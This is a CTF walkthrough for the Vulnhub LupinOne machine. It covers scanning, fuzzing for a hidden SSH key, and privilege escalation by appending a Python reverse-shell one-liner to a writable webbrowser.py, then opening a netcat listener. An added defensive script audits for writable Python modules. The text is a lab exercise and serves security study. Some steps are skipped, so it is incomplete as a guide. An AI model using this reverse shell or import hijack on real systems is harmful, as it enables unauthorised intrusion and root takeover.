Today we will take a look at Vulnhub: LupinOne. My goal in sharing this writeup is to help you if you get stuck. Please try to understand each step and take notes.
- Network scan
Command: sudo nmap -p- -sV -sC -oN nmap/open --open 192.168.0.110
Let’s look at the “~ myfiles” extension.
Command: ffuf -u 'http://lupin/~FUZZ' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Here we have a username. Now let’s find his private key file. As we know, private key files are hidden files, so their names start with a "." symbol.
Command: ffuf -u 'http://lupin/~secret/.FUZZ' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .txt,.pub -fw 20
We found an encoded text. Let’s use CyberChef to decode it. After some research, I found that it was Base58.
Let’s check the connection to the target machine.
We use the fasttrack.txt wordlist to crack the private key’s passphrase, as stated in the message.
Command: echo 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")' >> /usr/lib/python3.9/webbrowser.py
Command: nc -nvlp 4242
Command: sudo -u arsene /usr/bin/python3.9 /home/arsene/heist.py
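The weakness behind the last three steps, a module on Python's import path that a low-privileged user can write to, is something a defender can audit for. The script below is an added example, not part of the original writeup; `find_writable_modules` and `demo` are names I chose, and the fixture directory in `demo` is constructed to mirror the writable webbrowser.py.

```python
import os
import stat
import tempfile

# A privileged Python script (here: heist.py run via sudo) resolves imports
# from sys.path. Any module file or directory on that path that an unprivileged
# user can write lets that user hijack the import, which is the webbrowser.py
# weakness abused on this box. This audit lists such files and directories.
def find_writable_modules(dirs, suffixes=(".py", ".pth")):
    """Return (path, reason) for group- or world-writable module files and
    directories under the given search directories (e.g. sys.path)."""
    findings = []
    for base in dirs:
        if not base or not os.path.isdir(base):
            continue  # '' means the cwd; skip it and anything missing
        for root, _subdirs, files in os.walk(base):
            # "" stands for the directory itself: a writable directory is as
            # bad as a writable file, since a module can simply be dropped in.
            for name in [""] + files:
                if name and not name.endswith(suffixes):
                    continue
                path = root if name == "" else os.path.join(root, name)
                try:
                    mode = os.lstat(path).st_mode
                except OSError:
                    continue
                if stat.S_ISLNK(mode):
                    continue  # a symlink's own mode says nothing useful
                if mode & stat.S_IWOTH:
                    findings.append((path, "world-writable"))
                elif mode & stat.S_IWGRP:
                    findings.append((path, "group-writable"))
    return findings

def demo():
    """Constructed fixture (not from the box): a fake library directory with
    one correctly permissioned module and one world-writable webbrowser.py."""
    tmp = tempfile.mkdtemp()
    safe = os.path.join(tmp, "helper.py")
    weak = os.path.join(tmp, "webbrowser.py")
    for path in (safe, weak):
        with open(path, "w") as fh:
            fh.write("# stub module\n")
    os.chmod(tmp, 0o755)
    os.chmod(safe, 0o644)  # owner-writable only: fine
    os.chmod(weak, 0o666)  # anyone can append a payload: flagged
    return [os.path.basename(p) for p, _ in find_writable_modules([tmp])]
```

Run `find_writable_modules(sys.path)` on a real host to audit the running interpreter; anything it reports should be reset to 0644 (files) or 0755 (directories) and owned by root.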
And now we are root.
"If you have any questions or comments, please do not hesitate to write. Have a good day!"